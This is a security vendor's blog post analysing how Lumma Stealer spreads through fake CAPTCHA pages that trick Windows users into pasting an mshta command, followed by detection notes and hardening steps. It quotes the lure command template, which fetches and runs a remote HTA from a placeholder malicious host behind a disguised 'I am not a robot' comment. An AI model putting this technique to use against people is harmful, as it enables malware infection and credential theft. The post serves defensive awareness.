Fake CAPTCHAs, Real Threats: How Lumma Stealer Tricks Users into Self-Inflicted Malware
Executive Summary
SenseOn has detected a large increase in the Lumma Stealer malware targeting customers over the past few months. Unlike traditional malware strains, Lumma Stealer has been leveraging a unique, and increasingly effective, access vector of fake CAPTCHA verification prompts. These deceptive prompts trick users into running malicious commands on their device eventually injecting malicious processes into legitimate programs. This attack vector is expected to become even more prevalent throughout 2025.
This blog explores how Lumma Stealer operates, highlights the dangers of this innovative attack method, and demonstrates how SenseOn detects this malicious behaviour. We also look into actionable recommendations, including blocking the mshta.exe process and disabling the run dialog, to protect your environment from Lumma Stealer infections.
What is Lumma Stealer?
Lumma Stealer is a strain of information-stealing malware that has been observed in the wild since 2022 and is currently offered on the Dark Web as part of a Malware-as-a-Service (MaaS) model. Similar to other info-stealers, Lumma Stealer attempts to exfiltrate the system and installed program data from compromised devices. Lumma Stealer will also exfiltrate sensitive information including; browser cookies, stored credentials and financial information.
Lumma Stealer has been observed targeting a range of individuals and organisations, likely due to the availability of the malware. Furthermore, as this operates under a Malware-as-a-Service (MaaS) model, it enables low-level threat actors to successfully compromise victims with minimal technical expertise.
It is believed that Lumma Stealer had been developed by the threat group ‘Shamel’ who uses the alias ‘Lumma’. The group has been active since at least August 2022, offering their malware on primarily Russian-speaking dark web forums.
Initial Access
In recent campaigns, SenseOn has observed Lumma Stealer being deployed through fake CAPTCHA verifications hosted on compromised websites. CAPTCHAs are security tests designed to differentiate between human users and automated behaviour, this typically requires users to solve puzzles including identifying objects in images or typing distorted text. Victims are usually redirected to these malicious sites through SEO (Search Engine Optimisation) manipulation or by clicking on malicious ads displayed on legitimate websites. Threat intelligence also suggests these compromised/malicious domains are being distributed through phishing emails. Once users visit these sites, they are confronted with a deceptive CAPTCHA prompt designed to trick them into executing malicious actions.
When users interact with the fake CAPTCHA, a pop-up prompts them to paste the contents of their clipboard into the 'Run' dialog box on their Windows machine. This command is crafted so users only see the benign string ‘✅"I am not a robot - reCAPTCHA Verification ID: <random digits>”’. This string matches what is noted on the compromised website.
Due to the length of the command, the malicious command being executed is hidden. The command being executed is as follows:‘mshta <malicious website> # ✅ ''I am not a robot - reCAPTCHA Verification ID: <random digits>’
An example of the initial access website along with the Run dialog command can be seen below:
Upon execution of this command, a disguised HTA file is obtained from a malicious domain. HTA files are a type of HTML application which has the ability to run an executable, allowing tasks to be performed directly on a Windows system. This HTA file leads to the execution of obfuscated powershell eventually deploying Lumma Stealer malware to the device.
How Does SenseOn detect this?
SenseOn leverages Deep Packet Inspection (DPI) and AI triangulation to thoroughly analyse and detect activity generated by malware strains like Lumma Stealer. By unifying network and process telemetry, we are able to develop comprehensive detections aligned with MITRE tactics and techniques. This includes techniques observed at every step of the infection chain, from the malicious MSHTA command to obfuscated PowerShell code to command and control network traffic. This correlation provides a complete view of the tactics associated with the threat, enabling swift and effective response.
To detect this specific method of initial access, our detections such as ‘Living Off the Land binary (LOLBIN) making an unusual network connection’ and ‘Suspicious connection from commonly abused process’ can identify ‘mshta.exe’ connecting to suspicious external domains. This enables us to quickly detect the first-stage payload download.
In these instances of Lumma Stealer running we also see ‘mshta.exe’ executing a malicious encoded powershell command, this behaviour triggers SenseOn observation ‘Mshta Spawning Windows Shell’ to be raised in the platform. This behaviour is a key indicator of the deployment of Lumma Stealer.
Once Lumma stealer is successfully deployed, the malware begins beaconing to suspicious domains. This beaconing behaviour is performed by the ‘powershell.exe’ process and further raises ‘Suspicious connection from commonly abused process’.
Example case from Lumma Stealer running in a sandbox environment with a summary generated by SenseOn AI. In this environment, EPP was disabled allowing the malware to successfully run.
How can you prevent this?
SenseOn strongly recommends disabling the Run dialog box across all devices in your environment. This can be accomplished through Group Policy or the Windows Registry.
For Group Policy, the ‘Remove Run menu from Start Menu’ policy should be modified to ‘enabled’. This is located in the path User Configuration → Administrative Templates → Start Menu and Taskbar
Double-click the policy setting to edit it, set the policy to ‘Enabled’, and then click ‘Apply’ to save the changes.
The second method involves adding a new DWORD value named ‘NoRun’ to the registry path ‘HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer’. Set the value to ‘1’ and, after a reboot, the run dialog will be disabled
SenseOn also recommends preventing the execution of ‘mshta.exe’ through AppLocker. To do this, navigate to the Group Policy location Computer Configuration → Windows Settings → Security Settings → Application Control Policies → AppLocker → Executable Rules in. Right click on ‘Executable Rules’ and create a new rule:
In the ‘Create New Rule’ wizard, set the permission to Deny and choose the condition ‘File Hash’. In the ‘File hash’ pane, specify the path for ‘mshta.exe’ located in ‘C:\Windows\System32’.
We also advise setting PowerShell execution policies to prevent execution of unauthorised, malicious and unsigned scripts.
Conclusion
Lumma Stealer represents a significant and evolving threat, with recent cases observed by SenseOn consistently leveraging fake CAPTCHA acts as a highly effective initial access tactic.
By understanding this attack vector and implementing proactive security measures, such as disabling the Run dialog, organisations can significantly reduce the risk posed by this malware.
SenseOn’s advanced detection capabilities enable rapid identification of Lumma Stealer infections. When paired with SenseOn's Active Response feature, SenseOn users can swiftly contain and eradicate these threats.
Stay tuned for an upcoming in-depth technical analysis of Lumma Stealer.
